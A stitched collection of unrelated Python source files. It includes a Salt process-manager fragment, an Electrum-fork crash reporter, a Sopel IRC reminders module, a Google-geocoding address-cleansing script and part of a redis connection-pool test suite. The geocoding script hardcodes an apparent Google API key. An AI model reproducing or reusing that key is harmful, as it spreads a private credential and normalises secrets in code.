self._process_map[pid]['Process'].exitcode))
# don't block, the process is already dead
self._process_map[pid]['Process'].join(1)
self.add_process(self._process_map[pid]['tgt'],
self._process_map[pid]['args'],
self._process_map[pid]['kwargs'])
del self._process_map[pid]
def run(self):
'''
Load and start all available api modules
'''
salt.utils.appendproctitle(self.name)
# make sure to kill the subprocesses if the parent is killed
signal.signal(signal.SIGTERM, self.kill_children)
try:
if HAS_PYTHON_SYSTEMD and systemd.daemon.booted():
systemd.daemon.notify('READY=1')
except SystemError:
# Daemon wasn't started by systemd
pass
while True:
try:
# in case someone died while we were waiting...
self.check_children()
pid, exit_status = os.wait()
if pid not in self._process_map:
log.debug(('Process of pid {0} died, not a known'
' process, will not restart').format(pid))
continue
self.restart_process(pid)
# OSError is raised if a signal handler is called (SIGTERM) during os.wait
except OSError:
break
def check_children(self):
'''
Check the children once
'''
for pid, mapping in six.iteritems(self._process_map):
if not mapping['Process'].is_alive():
self.restart_process(pid)
def kill_children(self, *args):
'''
Kill all of the children
'''
# check that this is the correct process, children inherit this
# handler, if we are in a child lets just run the original handler
if os.getpid() != self._pid:
if callable(self._sigterm_handler):
return self._sigterm_handler(*args)
elif self._sigterm_handler is not None:
return signal.default_int_handler(signal.SIGTERM)(*args)
else:
return
for pid, p_map in self._process_map.items():
p_map['Process'].terminate()
end_time = time.time() + self.wait_for_kill # when to die
while self._process_map and time.time() < end_time:
for pid, p_map in self._process_map.items():
p_map['Process'].join(0)
# This is a race condition if a signal was passed to all children
try:
del self._process_map[pid]
except KeyError:
pass
# if anyone is done after
for pid in self._process_map:
try:
os.kill(signal.SIGKILL, pid)
# in case the process has since decided to die, os.kill returns OSError
except OSError:
pass
|
base_crash_reporter.py
|
# Electrum - lightweight Bitcoin client
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import asyncio
import json
import locale
import traceback
import sys
import queue
from .version import ELECTRUM_VERSION
from . import constants
from .i18n import _
from .util import make_aiohttp_session
from .logging import describe_os_version, Logger, get_git_version
class BaseCrashReporter(Logger):
report_server = "https://crashhub.electrum.plcultima.info/"
config_key = "show_crash_reporter"
issue_template = """<h2>Traceback</h2>
<pre>
{traceback}
</pre>
<h2>Additional information</h2>
<ul>
<li>Electrum version: {app_version}</li>
<li>Python version: {python_version}</li>
<li>Operating system: {os}</li>
<li>Wallet type: {wallet_type}</li>
<li>Locale: {locale}</li>
</ul>
"""
CRASH_MESSAGE = _('Something went wrong while executing Electrum.')
CRASH_TITLE = _('Sorry!')
REQUEST_HELP_MESSAGE = _('To help us diagnose and fix the problem, you can send us a bug report that contains '
'useful debug information:')
DESCRIBE_ERROR_MESSAGE = _("Please briefly describe what led to the error (optional):")
ASK_CONFIRM_SEND = _("Do you want to send this report?")
USER_COMMENT_PLACEHOLDER = _("Do not enter sensitive/private information here. "
"The report will be visible on the public issue tracker.")
def __init__(self, exctype, value, tb):
Logger.__init__(self)
self.exc_args = (exctype, value, tb)
def send_report(self, asyncio_loop, proxy, endpoint="/crash", *, timeout=None):
if constants.net.GENESIS[-4:] not in ["29a0", "bfe2"] and ".electrum.plcultima.info" in BaseCrashReporter.report_server:
# Gah! Some kind of altcoin wants to send us crash reports.
raise Exception(_("Missing report URL."))
report = self.get_traceback_info()
report.update(self.get_additional_info())
report = json.dumps(report)
coro = self.do_post(proxy, BaseCrashReporter.report_server + endpoint, data=report)
response = asyncio.run_coroutine_threadsafe(coro, asyncio_loop).result(timeout)
return response
async def do_post(self, proxy, url, data):
async with make_aiohttp_session(proxy) as session:
async with session.post(url, data=data, raise_for_status=True) as resp:
return await resp.text()
def get_traceback_info(self):
exc_string = str(self.exc_args[1])
stack = traceback.extract_tb(self.exc_args[2])
readable_trace = self.__get_traceback_str_to_send()
id = {
"file": stack[-1].filename,
"name": stack[-1].name,
"type": self.exc_args[0].__name__
}
return {
"exc_string": exc_string,
"stack": readable_trace,
"id": id
}
def get_additional_info(self):
args = {
"app_version": get_git_version() or ELECTRUM_VERSION,
"python_version": sys.version,
"os": describe_os_version(),
"wallet_type": "unknown",
"locale": locale.getdefaultlocale()[0] or "?",
"description": self.get_user_description()
}
try:
args["wallet_type"] = self.get_wallet_type()
except:
# Maybe the wallet isn't loaded yet
pass
return args
def __get_traceback_str_to_send(self) -> str:
# make sure that traceback sent to crash reporter contains
# e.__context__ and e.__cause__, i.e. if there was a chain of
# exceptions, we want the full traceback for the whole chain.
return "".join(traceback.format_exception(*self.exc_args))
def _get_traceback_str_to_display(self) -> str:
# overridden in Qt subclass
return self.__get_traceback_str_to_send()
def get_report_string(self):
info = self.get_additional_info()
info["traceback"] = self._get_traceback_str_to_display()
return self.issue_template.format(**info)
def get_user_description(self):
raise NotImplementedError
def get_wallet_type(self) -> str:
raise NotImplementedError
class EarlyExceptionsQueue:
"""Helper singleton for explicitly sending exceptions to crash reporter.
Typically the GUIs set up an "exception hook" that catches all otherwise
uncaught exceptions (which unroll the stack of a thread completely).
This class provides methods to report *any* exception, and queueing logic
that delays processing until the exception hook is set up.
"""
_is_exc_hook_ready = False
_exc_queue = queue.Queue()
@classmethod
def set_hook_as_ready(cls):
if cls._is_exc_hook_ready:
return
cls._is_exc_hook_ready = True
while cls._exc_queue.qsize() > 0:
e = cls._exc_queue.get()
cls._send_exception_to_crash_reporter(e)
@classmethod
def send_exception_to_crash_reporter(cls, e: BaseException):
if cls._is_exc_hook_ready:
cls._send_exception_to_crash_reporter(e)
else:
cls._exc_queue.put(e)
@staticmethod
def _send_exception_to_crash_reporter(e: BaseException):
assert EarlyExceptionsQueue._is_exc_hook_ready
sys.excepthook(type(e), e, e.__traceback__)
send_exception_to_crash_reporter = EarlyExceptionsQueue.send_exception_to_crash_reporter
def trigger_crash():
# note: do not change the type of the exception, the message,
# or the name of this method. All reports generated through this
# method will be grouped together by the crash reporter, and thus
# don't spam the issue tracker.
class TestingException(Exception):
pass
def crash_test():
raise TestingException("triggered crash for testing purposes")
import threading
t = threading.Thread(target=crash_test)
t.start()
|
reminders.py
|
"""This module allows to set and manage reminders."""
from __future__ import (
unicode_literals,
absolute_import,
print_function,
division
)
import os
import re
import time
import threading
import collections
import codecs
from datetime import datetime
from sopel.module import commands, example, NOLIMIT
import sopel.tools
from sopel.tools.time import get_timezone, format_time
try:
import pytz
except ImportError:
pytz = None
def filename(self):
"""Format filename of reminders database file."""
name = self.nick + '-' + self.config.core.host + '.reminders.db'
return os.path.join(self.config.core.homedir, name)
def load_database(name):
"""Load reminders from database file."""
data = {}
if os.path.isfile(name):
f = codecs.open(name, 'r', encoding='utf-8')
for line in f:
unixtime, channel, nick, message = line.split('\t')
message = message.rstrip('\n')
t = int(float(unixtime))
reminder = (channel, nick, message)
try:
data[t].append(reminder)
except KeyError:
data[t] = [reminder]
f.close()
return data
def dump_database(name, data):
"""Save reminders to database file."""
f = codecs.open(name, 'w', encoding='utf-8')
for unixtime, reminders in sopel.tools.iteritems(data):
for channel, nick, message in reminders:
f.write('%s\t%s\t%s\t%s\n' % (unixtime, channel, nick, message))
f.close()
def setup(bot):
"""Setup bot: start monitoring and sending reminders."""
bot.rfn = filename(bot)
bot.rdb = load_database(bot.rfn)
def monitor(bot):
time.sleep(5)
while True:
now = int(time.time())
unixtimes = [int(key) for key in bot.rdb]
oldtimes = [t for t in unixtimes if t <= now]
if oldtimes:
for oldtime in oldtimes:
for (channel, nick, message) in bot.rdb[oldtime]:
if message:
bot.msg(channel, nick + ': ' + message)
else:
bot.msg(channel, nick + '!')
del bot.rdb[oldtime]
dump_database(bot.rfn, bot.rdb)
time.sleep(2.5)
targs = (bot,)
t = threading.Thread(target=monitor, args=targs)
t.start()
scaling = collections.OrderedDict([
('years', 365.25 * 24 * 3600),
('year', 365.25 * 24 * 3600),
('yrs', 365.25 * 24 * 3600),
('y', 365.25 * 24 * 3600),
('months', 29.53059 * 24 * 3600),
('month', 29.53059 * 24 * 3600),
('mo', 29.53059 * 24 * 3600),
('weeks', 7 * 24 * 3600),
('week', 7 * 24 * 3600),
('wks', 7 * 24 * 3600),
('wk', 7 * 24 * 3600),
('w', 7 * 24 * 3600),
('days', 24 * 3600),
('day', 24 * 3600),
('d', 24 * 3600),
('hours', 3600),
('hour', 3600),
('hrs', 3600),
('hr', 3600),
('h', 3600),
('minutes', 60),
('minute', 60),
('mins', 60),
('min', 60),
('m', 60),
('seconds', 1),
('second', 1),
('secs', 1),
('sec', 1),
('s', 1),
])
periods = '|'.join(scaling.keys())
@commands('in')
@example('.in 3h45m Release a new version of ZppixBot')
def remind(bot, trigger):
"""Give user a reminder in the given amount of time."""
if not trigger.group(2):
bot.say("Missing arguments for reminder command.")
return NOLIMIT
if trigger.group(3) and not trigger.group(4):
bot.say("No message was given for the reminder. Perhaps you should "
"try again?")
return NOLIMIT
duration = 0
message = filter(None, re.split(
r'(\d+(?:\.\d+)? ?(?:(?i)' + periods + ')) ?',
trigger.group(2)
)[1:])
reminder = ''
stop = False
for piece in message:
grp = re.match(r'(\d+(?:\.\d+)?) ?(.*) ?', piece)
if grp and not stop:
length = float(grp.group(1))
factor = scaling.get(grp.group(2).lower(), 60)
duration += length * factor
else:
reminder = reminder + piece
stop = True
if duration == 0:
return bot.reply("Sorry, didn't understand. Please try again.")
if duration % 1:
duration = int(duration) + 1
else:
duration = int(duration)
timezone = get_timezone(
bot.db, bot.config, None, trigger.nick, trigger.sender)
create_reminder(bot, trigger, duration, reminder, timezone)
@commands('at')
@example('.at 13:47 Update the servers!')
def at(bot, trigger):
"""
Give user a reminder at the given time.
Time format: hh:mm:ss.
To see what timezone is used, type .getchanneltz (if setting a reminder
in an IRC channel) or .gettz (elsewhere)
"""
if not trigger.group(2):
bot.say("No arguments given for reminder command.")
return NOLIMIT
if trigger.group(3) and not trigger.group(4):
bot.say("No message was given for the reminder. Perhaps you should "
"try again?")
return NOLIMIT
regex = re.compile(r'(\d+):(\d+)(?::(\d+))?([^\s\d]+)? (.*)')
match = regex.match(trigger.group(2))
if not match:
bot.reply("Sorry, but I didn't understand, please try again.")
return NOLIMIT
hour, minute, second, tz, message = match.groups()
if not second:
second = '0'
if pytz:
timezone = get_timezone(bot.db, bot.config, tz,
trigger.nick, trigger.sender)
if not timezone:
timezone = 'UTC'
now = datetime.now(pytz.timezone(timezone))
at_time = datetime(now.year, now.month, now.day,
int(hour), int(minute), int(second),
tzinfo=now.tzinfo)
timediff = at_time - now
else:
if tz and tz.upper() != 'UTC':
bot.reply("I don't have timezone support installed.")
return NOLIMIT
now = datetime.now()
at_time = datetime(now.year, now.month, now.day,
int(hour), int(minute), int(second))
timediff = at_time - now
duration = timediff.seconds
if duration < 0:
duration += 86400
create_reminder(bot, trigger, duration, message, 'UTC')
def create_reminder(bot, trigger, duration, message, tz):
"""Create reminder within specified period of time and message."""
t = int(time.time()) + duration
reminder = (trigger.sender, trigger.nick, message)
try:
bot.rdb[t].append(reminder)
except KeyError:
bot.rdb[t] = [reminder]
dump_database(bot.rfn, bot.rdb)
if duration >= 60:
remind_at = datetime.utcfromtimestamp(t)
timef = format_time(bot.db, bot.config, tz, trigger.nick,
trigger.sender, remind_at)
bot.reply('Okay, I will set the reminder for: %s' % timef)
else:
bot.reply('Okay, I will send the reminder in %s secs' % duration)
@commands('cancelreminder')
@example('.cancelreminder (insert reminder message here)')
def cancel(bot, trigger):
"""Cancel reminder."""
bot.reply(('Pinging MacFan4000, Reception123, or Zppix to cancel '
'{}\'s reminder.').format(trigger.nick))
|
PotentialMatch_Cleanser.py
|
#!/usr/bin/python
"""
POTENTIAL ADDRESS CLEANSING BASED ON GOOGLE GEOCODER API and SequenceMatcher
RETURNS THE CROSS STREETS, POTENTIAL BUSINESSES AND THE NO MATCHES
"""
import json
import logging
import os
import re
import uuid
from difflib import SequenceMatcher
import itertools
import requests
import sys
import threading
import time
logger = logging.getLogger("root")
logger.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
logger.addHandler(ch)
shoppingstreet_path = "data/output_files/shoppingstreet.json"
city_path = "data/output_files/city.json"
input_filename = "data/output_files/potential_match.json"
input_filename1 = 'data/intern_database/dictionary1.txt'
input_filename2 = 'data/intern_database/dictionary2.txt'
input_filename3 = 'data/intern_database/dictionary3.txt'
input_filename4 = 'data/intern_database/streetvocabulary_types.txt'
input_filename5 = 'data/intern_database/business_types.txt'
cross_streetsfile_path = "data/output_files/cross_streets.json"
nomatchfile_path = "data/output_files/no_match.json"
valid_address_path = "data/output_files/valid_address.json"
cross_streets_count = 0
no_match_count = 0
cross_streets = []
potential_match = []
done = False
# ------------------ DATA LOADING ---------------------------------------------
# loading potential matches file
with open(input_filename, 'r') as outfile:
addresses = json.load(outfile)
outfile.close()
# loading dictionary OSM germany streets ( Dictionary1 )
with open(input_filename1, 'r') as outfile:
dictionary1 = outfile.read()
dictionary1 = dictionary1.split("\n")
outfile.close()
# loading dictionary Street Vocabularies ( Dictionary2 )
with open(input_filename2, 'r') as outfile:
dictionary2 = outfile.read()
dictionary2 = dictionary2.split("\n")
outfile.close()
# loading dictionary no business ( Dictionary3 )
with open(input_filename3, 'r') as outfile:
dictionary3 = outfile.read()
if len(dictionary3) > 0:
dictionary3 = dictionary3.split("\n")
else:
dictionary3 = []
outfile.close()
# loading StreetVocabulary Types
with open(input_filename4, 'r') as outfile:
vocab_type = outfile.read()
vocab_type = vocab_type.split("\n")
outfile.close()
# loading business Types
with open(input_filename5, 'r') as outfile:
business_type = outfile.read()
business_type = business_type.split("\n")
outfile.close()
# ----------------- FUNCTION DEFINITIONS --------------------------------
def animate():
"""
animation function for the terminal
"""
for c in itertools.cycle(['|', '/', '-', '\\']):
if done:
break
sys.stdout.write('\rloading ' + c)
sys.stdout.flush()
time.sleep(0.1)
sys.stdout.write('\r Done! ')
def similar(a, b):
"""
:param a: string
:param b: string
:return: ratio of matching
"""
return SequenceMatcher(None, a, b).ratio()
def similarL(a, b, ratio):
"""
get similar ratio between a string in a list
:param a: String
:param b: List of strings
:return:
"""
for x in b:
if SequenceMatcher(None, a, x).ratio() > ratio:
return x
return False
def similarL1(a, b):
"""
get similar between a string and a string in a list
:param a: String
:param b: List of strings
:return: boolean
"""
for x in b:
if x.lower() in a.lower():
return True
return False
def similarL2(a, b, ratio):
"""
get similar ratio between a string in a list
:param a: String
:param b: List of strings
:return:
"""
for x in b:
if SequenceMatcher(None, a.lower(), x.lower()).ratio() > ratio:
return x
return False
def index_of(val, in_list):
"""
:param val: String variable to test
:param in_list: list of Strings
:return: index of the value if it's in the list
"""
try:
return in_list.index(val)
except ValueError:
return -1
def get_street_name(street_id):
"""
:param street_id: String shopping street id to check
:return: street name related, from shoppingstreet.json
"""
street_name = None
with open(shoppingstreet_path, "r+") as shop_check:
shop_check.seek(0, os.SEEK_SET)
shops = json.load(shop_check)
shop_check.close()
for shop in shops:
if shop["street_id"] in street_id:
street_name = shop["name"]
return street_name
def get_citiy_name(city_id):
"""
:param city_id: String city id to check
:return: city name related, from city.json
"""
city_name = None
with open(city_path, "r+") as city_check:
city_check.seek(0, os.SEEK_SET)
cities = json.load(city_check)
city_check.close()
for citie in cities:
if citie["city_id"] in city_id:
city_name = citie["name"]
return city_name
def get_cross_streets(address, related):
"""
:param address:
:return: True if entry is a cross street
"""
pattern0 = re.compile("\-$")
dic_pattern = {"strasse", "straße", "weg", "platz", "übergang", "durchgang", "allee"}
address = address.replace('str.', 'straße')
address = address.replace('pl.', 'platz')
if -1 < address.find("-") < len(address) - 1:
address = re.sub("-", " ", address)
if len(address) < 7:
return False
for lines in dictionary1:
if pattern0.search(address):
for line in dic_pattern:
if similar(re.sub(pattern0, line, address), lines) > 0.97:
return lines
if similar(address, lines) > 0.97:
return lines
if 0.6 < similar(address, lines) < 0.7:
for item in related:
if (similar((address + " " + item), lines) > 0.9 or similar((item + " " + address), lines) > 0.9) and (
len(item) > 2):
return lines
return False
def is_cross_street(street1, street2, city):
"""
Test if 2 street crosses
:param street1: String street name 2
:param street2: String street name 1
:param city: String city name
:return: boolean
"""
if "intersection" in get_google_results("geocoding", [street1, street2, city], return_response_fields=None)[0][
"type"]:
return True
return False
def get_google_results(api_id, address, return_response_fields=None):
"""
Get google results from Google Maps Geocoding API / Google Maps Places API / Google Maps Place details API
@param address: String address. Complete Address example "18 Starbucks Alexanderplatz, Berlin, Germany"
Address may vary based on the API used.
@param api_id: Number refers to which API is requested:
1: geocoding API
2: findplacefromtext API
3: nearbysearch API
@param return_response_fields: Booleen/String indicate to return the full response from google if its None
Or returns specific fields. For example :"google_ratings,website,formated_address, etc."
"""
# set up api key
api_key = "AIzaSyDQaVh67imEZW2FLH7hb33SB63jv2shkqQ"
request_url = ""
outputs = []
building = address[0]
address = address[0] + " " + address[1] + " " + address[2]
if api_id == "geocoding":
request_url = "https://maps.googleapis.com/maps/api/geocode/json?address={}".format(address) + "&key={}".format(
api_key)
if api_id == "nearbysearch":
lat_long = get_google_results(1, address,
return_response_fields="latitude").__str__() + "," + get_google_results(
1, address, return_response_fields="longitude").__str__()
request_url = "https://maps.googleapis.com/maps/api/place/nearbysearch/json?location={}".format(
lat_long) + "&rankby=distance&type=establishment&key={}".format(api_key)
results = requests.get(request_url)
results = results.json()
if len(results['results']) == 0:
outputs = ""
else:
for answer in results['results']:
if api_id == "geocoding":
output = {
"entry": building,
"street_number": [y['long_name'] for y in answer.get('address_components') if
'street_number' in y.get('types')],
"route_name": [z['long_name'] for z in answer.get('address_components') if
'route' in z.get('types')],
"latitude": answer.get('geometry').get('location').get('lat'),
"longitude": answer.get('geometry').get('location').get('lng'),
"google_place_id": answer.get("place_id"),
"type": ",".join(answer.get('types')),
"postcode": ",".join(
[x['long_name'] for x in answer.get('address_components') if 'postal_code' in x.get('types')]),
}
if len(output["street_number"]) < 1:
output["street_number"] = ["0"]
if len(output["route_name"]) < 1:
output["route_name"] = [answer.get('formatted_address')]
if "intersection" in output["type"]:
output["route_name"] = [building]
outputs += [output]
if return_response_fields is None:
return outputs
else:
output_filter = []
for item in outputs:
output_filter += [{"" + return_response_fields: item[return_response_fields]}]
outputs = output_filter
return outputs
print(
"\n ################################# Potential Matches Cleanser ######################################################")
t = threading.Thread(target=animate)
t.start()
result_google = []
vocabulary = []
business = []
vocabularies = []
businesses = []
for potential in addresses:
street_id = potential["street_id"]
city_id = potential["city_id"]
street_name = get_street_name(street_id)
city_name = get_citiy_name(city_id)
# check if the street is already been cleaned
# loading valid_address file
valid_found = 0
if os.stat(valid_address_path).st_size > 0:
with open(valid_address_path, 'r') as outfile:
valids = json.load(outfile)
outfile.close()
for v in valids:
if v["street_id"] == street_id: valid_found += 1
# ----- PROCESS 1 -------------CROSS STREETS FILTERING ---------------------------------
if valid_found < 1:
related_building = set()
cross_street = [{"street_id": potential["street_id"], "cross_streets": []}]
for item in potential["building"]: related_building.add(item)
for j in potential["building"]:
cr_str = get_cross_streets(j.lower(), related_building)
if cr_str is not False:
cross_street[len(cross_street) - 1]["cross_streets"] += [
{"cross_street_id": uuid.uuid4().__str__(), "name": cr_str.lower()}]
cross_streets_count += 1
potential["building"][index_of(j, potential["building"])] = ""
if cross_streets_count > 0: cross_streets += cross_street
print(
"\n ---------------------------- Cross Streets found with OSM's Streets database --------------------------------------")
print(json.dumps(cross_streets, ensure_ascii=False, indent=4))
# ------------------ BUSINESS & STREET VOCABULARIES FILTERING ---------------------------
# check if result have cross street:
for potential in addresses:
street_id = potential["street_id"]
city_id = potential["city_id"]
street_name = get_street_name(street_id)
city_name = get_citiy_name(city_id)
vocabulary = [{"street_id": street_id, "vocabulary": [], "nobusiness": []}]
vocabulary_count = 0
business = [{"street_id": street_id, "building": []}]
no_business_count = 0
business_count = 0
# check if the street is already been cleaned
# loading valid_address file
valid_found = 0
if os.stat(valid_address_path).st_size > 0:
with open(valid_address_path, 'r') as outfile:
valids = json.load(outfile)
outfile.close()
for v in valids:
if v["street_id"] == street_id: valid_found += 1
if valid_found < 1:
for entry in potential["building"]:
if len(entry) > 0:
is_not_similar = 0
if similarL1(entry.lower(), dictionary2):
vocabulary[len(vocabulary) - 1]["vocabulary"] += {entry.lower()}
vocabulary_count += 1
is_not_similar += 1
if similarL1(entry.lower(), dictionary3):
vocabulary[len(vocabulary) - 1]["nobusiness"] += {entry.lower()}
vocabulary_count += 1
is_not_similar += 1
if is_not_similar < 1:
building = entry.lower()
result_google += get_google_results("geocoding", [building, street_name, city_name],
return_response_fields=None)
cross_street_list = set()
for c in cross_streets:
if c["street_id"] is potential["street_id"]:
for b in c["cross_streets"]:
cross_street_list.add(b["name"])
cross_street_list_count = len(cross_street_list)
if len(result_google) > 0:
for result in result_google:
if (is_cross_street(result["route_name"][0].lower(), street_name.lower(), city_name.lower())) and (
street_name.lower() not in result["route_name"][0].lower()) and \
(similarL2(result["route_name"][0], cross_street_list, 0.7) is False):
cross_street_list.add(result["route_name"][0])
count_found = 0
for c in cross_streets:
if c["street_id"] in potential["street_id"]:
for x in c["cross_streets"]:
if similar(result["route_name"][0].lower(), x["name"].lower()) > 0.7:
count_found += 1
if count_found < 1:
c["cross_streets"].extend([{"cross_street_id": uuid.uuid4().__str__(),
"name": result["route_name"][0].lower()}])
if similarL(result["route_name"][0].lower(), cross_street_list, 0.70) or street_name.lower() in \
result["route_name"][0].lower() or \
similarL1(result["route_name"][0].lower(), cross_street_list):
building_types = result["type"].split(",")
if len(set(building_types).intersection(vocab_type)) > len(
set(building_types).intersection(business_type)):
vocabulary[len(vocabulary) - 1]["vocabulary"] += {result["entry"].lower()}
vocabulary_count += 1
no_match_count += 1
dictionary2.append(result["entry"].lower())
if len(set(building_types).intersection(business_type)) > len(
set(building_types).intersection(vocab_type)):
business[len(business) - 1]["building"] += {result["google_place_id"]}
business_count += 1
if len(set(building_types).intersection(vocab_type)) < 1 and len(
set(building_types).intersection(business_type)) < 1 and (
"intersection" not in building_types):
vocabulary[len(vocabulary) - 1]["nobusiness"] += {result["entry"].lower()}
dictionary3.append(result["entry"].lower())
no_match_count += 1
if (len(vocabulary[len(vocabulary) - 1]["vocabulary"]) > 0):
vocabularies += vocabulary
if (len(business[len(vocabulary) - 1]["building"]) > 0):
businesses += business
result_google = []
print(
"\n ---------------------------------- Cross Streets after Google's verification ----------------------------------------------")
print(json.dumps(cross_streets, ensure_ascii=False, indent=4))
print("\n ---------------------------- Vocabularies & Nobusinesses --------------------------------------")
if (len(vocabularies) > 0):
print(json.dumps(vocabularies, ensure_ascii=False, indent=4))
else:
print("\n No Vocabularies found")
print("------------------------------All Businesses Retrieved ----------------------------------------")
if (len(businesses) > 0):
print(json.dumps(businesses, ensure_ascii=False, indent=4))
else:
print("\n No Businesses found")
print(dictionary2)
################## WRITING JSON FILES ###########################################
# cross_street.json data writing
if cross_streets_count > 0:
if os.stat(cross_streetsfile_path).st_size == 0 and cross_streets.__len__() > 0:
with open(cross_streetsfile_path, 'a+') as outfile:
json.dump(cross_streets, outfile, ensure_ascii=False, indent=4)
outfile.close()
else:
with open(cross_streetsfile_path, 'a+') as outfile:
outfile.seek(0, os.SEEK_SET)
cross_streets1 = cross_streets
matchjson_d = json.load(outfile)
for street in matchjson_d:
for street1 in cross_streets:
if street1["street_id"] == street["street_id"]:
street["cross_streets"] = street1["cross_streets"]
cross_streets1.remove(street1)
outfile.truncate(0)
if len(cross_streets1) > 0: matchjson_d.extend(cross_streets1)
json.dump(matchjson_d, outfile, ensure_ascii=False, indent=4)
outfile.close()
# dictionary2.txt data writing
if dictionary2.__len__() > 0:
with open(input_filename2, 'a+') as outfile:
outfile.seek(0, os.SEEK_SET)
dictionary2 = "\n".join(dictionary2)
outfile.truncate(0)
outfile.write(dictionary2)
outfile.close()
# dictionary3.txt data writing
if dictionary3.__len__() > 0:
with open(input_filename3, 'a+') as outfile:
outfile.seek(0, os.SEEK_SET)
dictionary3 = "\n".join(dictionary3)
outfile.truncate(0)
outfile.write(dictionary3)
outfile.close()
# No_Match.json data writing
if len(vocabularies) > 0:
if os.stat(nomatchfile_path).st_size == 0:
with open(nomatchfile_path, 'a+') as outfile:
json.dump(vocabularies, outfile, ensure_ascii=False, indent=4)
outfile.close()
else:
with open(nomatchfile_path, 'a+') as outfile:
outfile.seek(0, os.SEEK_SET)
vocabularies1 = vocabularies
matchjson_d = json.load(outfile)
for street in matchjson_d:
for street1 in vocabularies:
if street1["street_id"] == street["street_id"]:
street["vocabulary"] = street1["vocabulary"]
street["nobusiness"] = street1["nobusiness"]
vocabularies1.remove(street1)
outfile.truncate(0)
if len(vocabularies1) > 0: matchjson_d.extend(vocabularies1)
json.dump(matchjson_d, outfile, ensure_ascii=False, indent=4)
outfile.close()
# Valid.json data writing
if len(businesses) > 0:
if os.stat(valid_address_path).st_size == 0:
with open(valid_address_path, 'a+') as outfile:
json.dump(businesses, outfile, ensure_ascii=False, indent=4)
outfile.close()
else:
with open(valid_address_path, 'a+') as outfile:
outfile.seek(0, os.SEEK_SET)
businesses1 = businesses
matchjson_d = json.load(outfile)
for street in matchjson_d:
for street1 in businesses:
if street1["street_id"] == street["street_id"]:
street["building"] = street1["building"] + street["building"]
businesses1.remove(street1)
outfile.truncate(0)
if len(businesses1) > 0: matchjson_d.extend(businesses1)
json.dump(matchjson_d, outfile, ensure_ascii=False, indent=4)
outfile.close()
done = True
|
test_connection_pool.py
|
import os
import re
import time
from threading import Thread
from unittest import mock
import pytest
import redis
from redis.connection import ssl_available, to_bool
from .conftest import _get_client, skip_if_redis_enterprise, skip_if_server_version_lt
from .test_pubsub import wait_for_message
class DummyConnection:
description_format = "DummyConnection<>"
def __init__(self, **kwargs):
self.kwargs = kwargs
self.pid = os.getpid()
def connect(self):
pass
def can_read(self):
return False
class TestConnectionPool:
def get_pool(
self,
connection_kwargs=None,
max_connections=None,
connection_class=redis.Connection,
):
connection_kwargs = connection_kwargs or {}
pool = redis.ConnectionPool(
connection_class=connection_class,
max_connections=max_connections,
**connection_kwargs,
)
return pool
def test_connection_creation(self):
connection_kwargs = {"foo": "bar", "biz": "baz"}
pool = self.get_pool(
connection_kwargs=connection_kwargs, connection_class=DummyConnection
)
connection = pool.get_connection("_")
assert isinstance(connection, DummyConnection)
assert connection.kwargs == connection_kwargs
def test_multiple_connections(self, master_host):
connection_kwargs = {"host": master_host[0], "port": master_host[1]}
pool = self.get_pool(connection_kwargs=connection_kwargs)
c1 = pool.get_connection("_")
c2 = pool.get_connection("_")
assert c1 != c2
def test_max_connections(self, master_host):
connection_kwargs = {"host": master_host[0], "port": master_host[1]}
pool = self.get_pool(max_connections=2, connection_kwargs=connection_kwargs)
pool.get_connection("_")
pool.get_connection("_")
with pytest.raises(redis.ConnectionError):
pool.get_connection("_")
def test_reuse_previously_released_connection(self, master_host):
connection_kwargs = {"host": master_host[0], "port": master_host[1]}
pool = self.get_pool(connection_kwargs=connection_kwargs)
c1 = pool.get_connection("_")
pool.release(c1)
c2 = pool.get_connection("_")
assert c1 == c2
def test_repr_contains_db_info_tcp(self):
connection_kwargs = {
"host": "localhost",
"port": 6379,
"db": 1,
"client_name": "test-client",
}
pool = self.get_pool(
connection_kwargs=connection_kwargs, connection_class=redis.Connection
)
expected = (
"ConnectionPool<Connection<"
"host=localhost,port=6379,db=1,client_name=test-client>>"
)
assert repr(pool) == expected
def test_repr_contains_db_info_unix(self):
connection_kwargs = {"path": "/abc", "db": 1, "client_name": "test-client"}
pool = self.get_pool(
connection_kwargs=connection_kwargs,
connection_class=redis.UnixDomainSocketConnection,
)
expected = (
"ConnectionPool<UnixDomainSocketConnection<"
"path=/abc,db=1,client_name=test-client>>"
)
assert repr(pool) == expected
class TestBlockingConnectionPool:
def get_pool(self, connection_kwargs=None, max_connections=10, timeout=20):
connection_kwargs = connection_kwargs or {}
pool = redis.BlockingConnectionPool(
connection_class=DummyConnection,
max_connections=max_connections,
timeout=timeout,
**connection_kwargs,
)
return pool
def test_connection_creation(self, master_host):
connection_kwargs = {
"foo": "bar",
"biz": "baz",
"host": master_host[0],
"port": master_host[1],
}
pool = self.get_pool(connection_kwargs=connection_kwargs)
connection = pool.get_connection("_")
assert isinstance(connection, DummyConnection)
assert connection.kwargs == connection_kwargs
def test_multiple_connections(self, master_host):
connection_kwargs = {"host": master_host[0], "port": master_host[1]}
pool = self.get_pool(connection_kwargs=connection_kwargs)
c1 = pool.get_connection("_")
c2 = pool.get_connection("_")
assert c1 != c2
def test_connection_pool_blocks_until_timeout(self, master_host):
"When out of connections, block for timeout seconds, then raise"
connection_kwargs = {"host": master_host[0], "port": master_host[1]}
pool = self.get_pool(
max_connections=1, timeout=0.1, connection_kwargs=connection_kwargs
)
pool.get_connection("_")
start = time.time()
with pytest.raises(redis.ConnectionError):
pool.get_connection("_")
# we should have waited at least 0.1 seconds
assert time.time() - start >= 0.1
def test_connection_pool_blocks_until_conn_available(self, master_host):
"""
